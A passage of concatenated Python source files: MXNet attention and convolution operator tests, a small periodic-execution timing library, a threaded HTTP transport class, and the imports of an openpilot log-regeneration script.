v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
qkv_weight = convert_weight(mx.sym, q_weight, k_weight, v_weight, num_heads)
qkv_bias = convert_bias(mx.sym, q_bias, k_bias, v_bias, num_heads)
qkv = mx.sym.transpose(qkv, axes=(1, 0, 2))
qkv_proj = mx.sym.FullyConnected(qkv, weight=qkv_weight, bias=qkv_bias, flatten=False,
num_hidden=qkv_units * 3, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_selfatt_qk(
qkv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_selfatt_valatt(
qkv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_device(),
qkv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
type_dict={'qkv': dtype,
'q_weight': dtype,
'k_weight': dtype,
'v_weight': dtype,
'q_bias': dtype,
'k_bias': dtype,
'v_bias': dtype,
'sonde': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(qkv, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(qkv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(qkv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_device(),
qkv=(batch_size, qkv_length, qkv_dim),
type_dict={'qkv': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_selfatt():
dtypes = ['float32']
if default_device().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_selfatt(dtype=dtype)
def check_multihead_attention_encdec(dtype):
def convert_weight(F, k_weight, v_weight, num_heads):
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, k_bias, v_bias, num_heads):
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'q': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'kv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
kv_weight = convert_weight(mx.sym, k_weight, v_weight, num_heads)
kv_bias = convert_bias(mx.sym, k_bias, v_bias, num_heads)
kv = mx.sym.transpose(kv, axes=(1, 0, 2))
kv_proj = mx.sym.FullyConnected(kv, weight=kv_weight, bias=kv_bias, flatten=False,
num_hidden=qkv_units * 2, no_bias=False)
q = mx.sym.transpose(q, axes=(1, 0, 2))
q_proj = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_encdec_qk(
q_proj, kv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_encdec_valatt(
kv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_device(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
out_weight=(out_dim, qkv_units),
out_bias=(out_dim,),
type_dict={'q': dtype,
'kv': dtype,
'q_weight': dtype,
'q_bias': dtype,
'k_weight': dtype,
'k_bias': dtype,
'v_weight': dtype,
'v_bias': dtype,
'out_weight': dtype,
'out_bias': dtype,
},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(kv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(kv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_device(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
type_dict={'q': dtype,
'kv': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_encdec():
dtypes = ['float32']
if default_device().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_encdec(dtype=dtype)
@pytest.mark.serial
def test_im2col_col2im():
def compute_output_size(spatial, kernel, stride=1, dilate=1, pad=0):
pad_size = spatial + 2 * pad
dilated_kernel = dilate * (kernel - 1) + 1
return (pad_size - dilated_kernel) // stride + 1
def build_kwargs(kernel, stride=1, dilate=1, pad=0):
return {'kernel': (kernel, kernel),
'stride': (stride, stride),
'dilate': (dilate, dilate),
'pad': (pad, pad)}
# use im2col to compute convolution
def test_conv_compute(input_shape, num_filter, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
w = mx.nd.uniform(shape=(num_filter, channel, kernel, kernel))
c1 = mx.nd.dot(col.transpose((0, 2, 1)), w.reshape(num_filter, -1).T).transpose((0, 2, 1))
hos = compute_output_size(input_shape[2], kernel, stride, dilate, pad)
wos = compute_output_size(input_shape[3], kernel, stride, dilate, pad)
c1 = c1.reshape((batch_size, num_filter, hos, wos))
c2 = mx.nd.Convolution(data, num_filter=num_filter, weight=w, no_bias=True, **kwargs)
assert_almost_equal(c1.asnumpy(), c2.asnumpy(), rtol=1e-5, atol=1e-5)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# use composite of im2col and col2im to reconstruct image
def test_reconstruct(input_shape, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
im1 = mx.nd.col2im(col, input_shape[2:], **kwargs)
im2 = mx.nd.col2im(mx.nd.ones_like(col), input_shape[2:], **kwargs) * data
assert_almost_equal(im1.asnumpy(), im2.asnumpy(), rtol=1e-5, atol=1e-5)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# test gradient
# the grad of im2col is col2im, and vice versa
def test_grad(input_shape, kernel, stride=1, dilate=1, pad=0):
# im2col
data = mx.sym.Variable('data')
kwargs = build_kwargs(kernel, stride, dilate, pad)
sym = mx.sym.im2col(data, **kwargs)
im = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(im, **kwargs)
col_shape = col.shape
expected = mx.nd.col2im(col, input_shape[2:], **kwargs)
check_symbolic_backward(sym, [im.asnumpy()], [col.asnumpy()], [expected.asnumpy()])
# col2im
data = mx.sym.Variable('data')
sym = mx.sym.col2im(data, input_shape[2:], **kwargs)
col = mx.nd.uniform(shape=col_shape)
im = mx.nd.col2im(col, input_shape[2:], **kwargs)
expected = mx.nd.im2col(im, **kwargs)
check_symbolic_backward(sym, [col.asnumpy()], [im.asnumpy()], [expected.asnumpy()])
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
def test_elemwise_sum_for_gradient_accumulation():
for nrepeat in range(1, 10):
stored_grad = dict()
for grad_req in ['write', 'add']:
a = mx.nd.array([1])
b = mx.nd.array([2])
if grad_req == 'write':
a.attach_grad(grad_req='write')
elif grad_req == 'add':
a.attach_grad(grad_req='add')
a.grad[:] = 0
with mx.autograd.record():
for _ in range(nrepeat):
b = b * a
b.backward()
stored_grad[grad_req] = a.grad.asscalar()
assert stored_grad['write'] == stored_grad['add']
assert stored_grad['write'] == 2 * nrepeat
def test_elementwise_ops_on_misaligned_input():
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[1:3]
d = b[1:3]
# Note: testing just elemwise_add since all elemwise_ops
# share the implementation
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[0:3]
d = b[0:3]
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
assert a[3].asscalar() == 4.0
@pytest.mark.parametrize('dtype', ['float16', 'float32', 'float64'])
@pytest.mark.parametrize('lead_dim', [2, 3, 4, 6, 10])
@pytest.mark.parametrize('both_ways', [False, True])
def test_broadcast_ops_on_misaligned_input(dtype, lead_dim, both_ways):
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], 1, lead_dim]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, L]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.product(shape)
small_size = np.product(small_shape)
big_size = np.product(big_shape)
a = mx.nd.arange(5000)
b = mx.nd.arange(5000)
e = mx.nd.arange(5000)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
@pytest.mark.parametrize('dtype', ['float16', 'float32', 'float64'])
@pytest.mark.parametrize('lead_dim', [2, 3, 4, 6, 10])
@pytest.mark.parametrize('both_ways', [False, True])
def test_broadcast_ops_on_misaligned_input_oneside(dtype, lead_dim, both_ways):
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], shape[1], 1]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, 1]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.product(shape)
small_size = np.product(small_shape)
big_size = np.product(big_shape)
a = mx.nd.arange(5000)
b = mx.nd.arange(5000)
e = mx.nd.arange(5000)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
def test_sldwin_selfatten_operators():
def gen_sliding_window_mask_full(batch_size, num_heads, seq_length, w, symmetric, d):
mask_np = np.zeros((batch_size, num_heads, seq_length, seq_length))
for i in range(seq_length):
end = (i + 1 + w * d) if symmetric else (i + 1)
for j in range(i - w * d, end, d):
if j >= 0 and j < seq_length:
mask_np[:, :, i, j] = 1
return mask_np
def test_sldwin_atten_op_impl(batch_size, seq_length, num_heads,
num_head_units, w, symmetric, d):
# Generate the data
query = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
key = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
value = np.random.normal(0, 1, (batch_size, seq_length, num_heads, num_head_units))
valid_length = np.zeros((batch_size,))
valid_length[:] = seq_length
query = mx.np.array(query, dtype=np.float32)
key = mx.np.array(key, dtype=np.float32)
value = mx.np.array(value, dtype=np.float32)
dilation = mx.np.ones((num_heads,), dtype=np.int32)
dilation[:] = d
valid_length = mx.np.array(valid_length, dtype=np.int32)
query.attach_grad()
key.attach_grad()
value.attach_grad()
with mx.autograd.record():
score = mx.npx.sldwin_atten_score(query, key, dilation,
w=w, symmetric=symmetric)
mask = mx.npx.sldwin_atten_mask_like(score, dilation, valid_length,
w=w, symmetric=symmetric)
score = score * mask
out = mx.npx.sldwin_atten_context(score, value, dilation,
w=w, symmetric=symmetric)
out.backward()
out_np = out.asnumpy()
grad_query = query.grad.asnumpy()
grad_key = key.grad.asnumpy()
grad_value = value.grad.asnumpy()
query.grad[:] = 0
key.grad[:] = 0
value.grad[:] = 0
mask_np = gen_sliding_window_mask_full(batch_size, num_heads, seq_length,
w, symmetric, d)
mask = mx.np.array(mask_np, dtype=np.float32)
with mx.autograd.record():
score = mx.npx.batch_dot(mx.np.swapaxes(query, 1, 2),
mx.np.swapaxes(key, 1, 2),
transpose_b=True)
score = score * mask
out = mx.npx.batch_dot(score,
mx.np.swapaxes(value, 1, 2)).transpose((0, 2, 1, 3))
out.backward()
out_np_gt = out.asnumpy()
grad_query_gt = query.grad.asnumpy()
grad_key_gt = key.grad.asnumpy()
grad_value_gt = value.grad.asnumpy()
assert_allclose(out_np_gt, out_np, 1E-3, 1E-3)
assert_allclose(grad_query_gt, grad_query, 1E-3, 1E-3)
assert_allclose(grad_key_gt, grad_key, 1E-3, 1E-3)
assert_allclose(grad_value_gt, grad_value, 1E-3, 1E-3)
for symmetric in [True, False]:
for d in [1, 2, 3]:
test_sldwin_atten_op_impl(2, 128, 2, 8, 16, symmetric, d)
test_sldwin_atten_op_impl(1, 8, 2, 4, 2, symmetric, d)
def test_zero_sized_dim():
# Must be done to prevent zero-sized dimension conversion to 'unknown'
prev_np_shape = mx.util.set_np_shape(True)
def seq_last():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18938"""
data = mx.nd.array(np.random.rand(1, 0, 0))
res = mx.nd.op.SequenceLast(data)
assert data.shape[1:] == res.shape
def seq_mask():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18939"""
data = mx.nd.array(np.random.rand(0, 1, 1))
res = mx.nd.op.SequenceMask(data)
assert data.shape == res.shape
def seq_reverse():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/18940"""
data = mx.nd.array(np.random.rand(0, 1, 1))
res = mx.nd.op.SequenceReverse(data)
assert data.shape == res.shape
try:
seq_last()
seq_reverse()
seq_mask()
finally:
mx.util.set_np_shape(prev_np_shape)
@mx.util.use_np
def test_take_grads():
# Test for https://github.com/apache/incubator-mxnet/issues/19817
from mxnet.gluon.nn import HybridBlock, Conv1D, HybridSequential, HybridLambda, Dense
from mxnet import autograd, np as mx_np, npx as mx_npx
from mxnet.gluon.loss import L2Loss
def get_grads(model, grads, ctx=mx.cpu()):
pd = model.collect_params()
total_grad_l2 = 0
total_grad_l1 = 0
total_grad_linf = 0
for p in pd:
try:
g = pd[p].grad(ctx) / N
g2 = (g**2).sum().as_in_context(mx.cpu()).asscalar()
g1 = g.abs().sum().as_in_context(mx.cpu()).asscalar()
ginf = g.max().as_in_context(mx.cpu()).asscalar()
total_grad_linf = max(total_grad_linf, ginf)
total_grad_l2 += g2
total_grad_l1 += g1
except Exception:
pass
grads.append(total_grad_l1)
grads.append(total_grad_l2)
grads.append(total_grad_linf)
def run_model(model, loss, X, Y, num_iters=5):
grads = []
for _ in range(num_iters):
with autograd.record():
Y_hat = model(X)
ll = loss(Y_hat, Y)
ll = ll.sum()
ll.backward()
get_grads(model, grads)
return grads
def dense_layer():
den = HybridSequential()
den.add(Dense(10, flatten=True, activation='tanh'))
return den
class Model(HybridBlock):
def __init__(self, use_take=False, **kwargs):
super().__init__()
self.use_take = use_take
self.den = dense_layer()
def forward(self, X, axis=1):
X1 = self.den(X)
print(X1.shape)
if self.use_take:
X2 = mx_np.take(X1, mx_np.array([0]), axis=axis)
else:
X2 = mx_npx.slice(X1.T, begin=0, end=1).T
return X2
N = 30
T = 20
C = 10
X = np.random.normal(size=(N, T, C))
Y = np.random.normal(size=(N, 1))
X, Y = mx_np.array(X), mx_np.array(Y)
seed = np.random.randint(1000)
# Using mx_np.take
mx.random.seed(seed)
model = Model(use_take=True)
model.initialize()
loss = L2Loss()
grads1 = run_model(model, loss, X, Y)
# Using mx_npx.slice
mx.random.seed(seed)
model2 = Model(use_take=False)
model2.initialize()
grads2 = run_model(model2, loss, X, Y)
for i in range(len(grads1)):
assert_almost_equal(grads1[i], grads2[i])
|
periodicrun.py
|
'''
MIT License
Copyright (c) 2016 Burak Kakillioğlu
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
'''
Author: Burak Kakillioglu
Date: 11/12/2016
Library name: periodicrun
Description:
Python library for running a loop periodically with ~100 microseconds accuracy.
This library provides functionality for periodic execution of a method with accurate timing.
It is meant by accurate timing that periodicrun guaranties that the loop will run every x seconds with 100 microsends (default) accuracy.
periodicrun uses Python's built-in sched library to schedule the execution of the given method periodically.
'''
import sched, time, threading
class periodicrun:
delta = 0.0
cycleCount = 0
is_thread = False
def __init__(self, period, loop, args=(), lifetime=0, accuracy=0.0001):
self.s = sched.scheduler(time.time, time.sleep)
self.period_acc = float(period)*accuracy
self.loop = loop
self.args = list(args)
self.lifetime = float(lifetime)
self.sample = 1/accuracy
self.tolerance = period * 1.1
def run(self):
self.offset = time.time()
self.lasttime = self.offset
self.cycle()
self.start_loop()
def run_thread(self):
self.is_thread = True
self.t = threading.Thread(target=self.start_loop)
self.offset = time.time()
self.lasttime = self.offset
self.cycle()
self.t.start()
def start_loop(self):
self.s.run()
def cycle(self):
self.delta = self.delta + self.period_acc
self.cycleCount = self.cycleCount+1
self.s.enterabs(self.offset + self.delta, 1, self.outer_loop, ())
def outer_loop(self):
if self.lifetime == 0 or self.delta < self.lifetime:
self.cycle()
if self.cycleCount == self.sample:
self.loop(*self.args)
self.cycleCount = 0
# Check if execution time exceeds period duration with %10 tolerance
now = time.time()
#print "now: ", now, ". self.lasttime: ", self.lasttime, ". diff: ", now-self.lasttime, "tol: ", self.tolerance
if now-self.lasttime > self.tolerance:
print "Warning: Execution time exceeds period duration"
self.lasttime = now
def join(self):
if self.is_thread:
self.t.join()
else: print "Error: Periodic run is not a seperate thread."
def interrupt(self):
if self.is_thread:
self.lifetime = 0.000001
print "Loop interrupted"
else: print "Error: Periodic run is not a seperate thread."
|
transport.py
|
import logging
import threading
from queue import Queue, Full
from urllib.request import Request, urlopen, HTTPError
from time import sleep
from typing import Dict
logger = logging.getLogger(__name__)
class Transport(object):
def send(self, url: str, headers: Dict[str, str], data: bytes):
raise NotImplementedError
class ThreadTransport(Transport):
def __init__(self, max_queue_size: int = -1, send_timeout: int = 5):
self._thread = None
self._active = False
self._lock = threading.Lock()
self._send_timeout = send_timeout
self._queue = Queue(max_queue_size)
def send(self, url: str, headers: Dict[str, str], data: bytes):
try:
self._queue.put((url, headers, data), block=False)
except Full:
logger.warning("Thread transport queue is full")
def is_alive(self):
return self._thread and self._thread.is_alive()
def start(self):
self._lock.acquire()
try:
if not self.is_alive():
name = "PySample.ThreadTransport"
self._active = True
self._thread = threading.Thread(target=self._run, name=name)
self._thread.setDaemon(True)
self._thread.start()
finally:
self._lock.release()
def stop(self, timeout: int = None):
with self._lock:
if self._thread:
self._thread.join(timeout=timeout)
self._thread = None
def _send_request(self, url: str, headers: Dict[str, str], data: bytes):
try:
response = urlopen(
url=Request(url, headers=headers), data=data, timeout=self._send_timeout
)
except HTTPError as e:
logger.error(str(e), stack_info=True)
raise
return response
def _run(self):
while self._active:
url, headers, data = self._queue.get()
try:
self._send_request(url, headers, data)
except Exception:
logger.error(f"Failed to send request to {url}")
finally:
self._queue.task_done()
sleep(0)
|
regen.py
|
#!/usr/bin/env python3
import os
import time
import multiprocessing
from tqdm import tqdm
import argparse
# run DM procs
os.environ["USE_WEBCAM"] = "1"
import cereal.messaging as messaging
from cereal.services import service_list
from cereal.visionipc.visionipc_pyx import VisionIpcServer, VisionStreamType # pylint: disable=no-name-in-module, import-error
from common.params import Params
from common.realtime import Ratekeeper, DT_MDL, DT_DMON, sec_since_boot
from common.transformations.camera import eon_f_frame_size, eon_d_frame_size, tici_f_frame_size, tici_d_frame_size
from selfdrive.car.fingerprints import FW_VERSIONS
from selfdrive.manager.process import ensure_running
from selfdrive.manager.process_config import managed_processes
from selfdrive.test.process_replay.process_replay import setup_env, check_enabled
from selfdrive.test.update_ci_routes import upload_route
from tools.lib.route import Route
from tools.lib.framereader import FrameReader
from tools.lib.logreader import LogReader
